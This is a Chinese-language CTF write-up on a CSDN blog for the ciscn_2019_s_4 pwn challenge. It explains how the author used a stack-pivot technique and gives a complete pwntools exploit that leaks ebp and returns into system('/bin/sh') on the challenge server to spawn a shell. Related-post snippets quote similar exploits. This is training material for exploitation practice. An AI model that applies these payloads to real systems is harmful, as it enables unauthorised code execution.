ciscn_2019_s_4 [write up]

于 2023-01-14 21:55:12 发布
阅读量215 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/128689850
版权

ciscn_2019_s_4

惯例先checksec一下

请添加图片描述

开启了NX保护的32位程序 放进ida里看看

请添加图片描述
main函数里没什么信息 进vul函数看看

有两个read函数 但是溢出长度尽到ebp 考虑栈迁移

请添加图片描述

shift+F12调出字符串表 发现system但没找到/bin/sh 由于函数使用过system函数 所以直接找到plt地址为0x8048400

利用ROPgadget找到leave ret的地址为0x080484b8
请添加图片描述
动态调试找到偏移量为0x38

利用栈迁移 成功获取到flag
请添加图片描述

exp:

from pwn import *
io=remote('node4.buuoj.cn',29721)
sys_addr=0x8048400
leave=0x080484b8

payload='a'*0x24+'bbbb'
io.recvuntil('name?')
io.send(payload)
io.recvuntil('bbbb')
ebp=u32(io.recv(4))

print(hex(ebp)) 

buf=ebp-0x38 
payload=(p32(sys_addr)+'aaaa'+p32(buf+12)+'/bin/sh\x00').ljust(0x28,'a')+p32(buf-4)+p32(leave)
io.send(payload) 
io.interactive()
  • 第二个payload中的’aaaa’为fake ebp,system函数的返回地址为“p32(buf+12)”(即/bin/sh\x00在栈上的地址)
  • /bin/sh后一定要加上\x00
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
栈迁移图解
qq_40410406的博客
11-11 1444
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
ciscn_2019_s_4-栈迁移
最新发布
个人笔记
06-07 665
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要栈迁移更大的空间来构造ROP。栈迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此栈帧迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。栈迁移核心(通过ROPGadget寻找。ebp位置:栈迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:栈溢出,栈迁移。作用:赋值执行函数调用。
【Pwn】BUUCTF ciscn_2019_s_4 wp 栈迁移
Lcw_linyx的博客
05-20 503
个人日记= =,记录pwn自己的自闭过程
ciscn_2019_s_4
doudoudedi
01-26 989
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
ply_write.rar_ply_write
09-20
本文将深入探讨如何使用MATLAB编写一个名为`ply_write.m`的函数,以实现PLY3D数据的写入功能。 首先,了解PLY文件的基本结构是至关重要的。PLY文件分为ASCII和二进制两种形式,其中ASCII格式易于阅读和调试,但数据...
PICOCTF_2019:picoCTF2019解决方案
02-18
【标签】:“binary-exploitation write-up picoctf-2019 C” 这些标签揭示了压缩包中的主要内容和技术方向。"binary-exploitation"表明了解题过程中涉及了二进制漏洞利用,这是CTF比赛中常见的一类挑战,通常需要...
mt_write.rar_Write On_dct_dct java
09-14
标题“mt_write.rar_Write On_dct_dct java”暗示了这是一个与数字信号处理相关的项目,特别是离散余弦变换(DCT)的实现,并且可能涉及到硬件编程和Java语言。描述“matrix dct write on the hardware”进一步明确...
GPIO.RAR_GPIO write_gpio read 22
09-21
标题中的"GPIO.RAR_GPIO write_gpio read 22"提到了GPIO(General-Purpose Input/Output)接口在Cortex-M0微处理器上的读写操作,特别是针对GPIO端口22的读取和写入功能。这里,我们主要讨论GPIO的基本概念、Cortex-...
sd.rar_SD 读写_write sd card
09-19
SD卡基于MMC(MultiMediaCard)协议,通过SPI(Serial Peripheral Interface)或SPI模式的4线接口与单片机通信。SD卡有多个存储块,每个块由若干个扇区组成,通常一个扇区大小为512字节。在进行读写操作时,必须按照...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[BUUCTF-pwn]——ciscn_2019_s_4
Y_peak的博客
03-12 450
[BUUCTF-pwn]——ciscn_2019_s_4 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_4 这道题是一道典型的栈劫持问题 前面有一道类似的,(挂了peak小知识), 如果需要可以去做一下 没有开启canary保护 在IDA中, 可以看出有明显的栈溢出, 不过溢出空间只够修改ebp和一个返回地址 但是, 仅仅一个返回地址是不够的, 并不能打印flag 思路 利用栈溢出,首先泄露出来main_ebp的地址 计算一下,我们输入的位置, 距离m
ciscn_s_4栈迁移
sea_time的博客
05-15 421
ciscn_s_4
buuctf ciscn_2019_s_4 pwn wp
weixin_44740530的博客
04-21 338
buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18
【pwn】ciscn_2019_s_3
Nothing
12-14 4506
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2019_s_1
doudoudedi
06-29 724
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1472
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
【pwn】 ciscn_2019_s_4
Nothing
03-06 761
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
UM_MC96F6432S:一款集成12bit A/D和LCD驱动的8位单片机
《UM_MC96F6432S_V1.9_CH.pdf》是一份关于MC96F6432S这款8位单片机的用户手册,它由ABOV Semiconductor Co., Ltd.发布。MC96F6432S以其高效、灵活和低成本的特点,适用于众多嵌入式控制应用,包括小家电和无刷直流...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值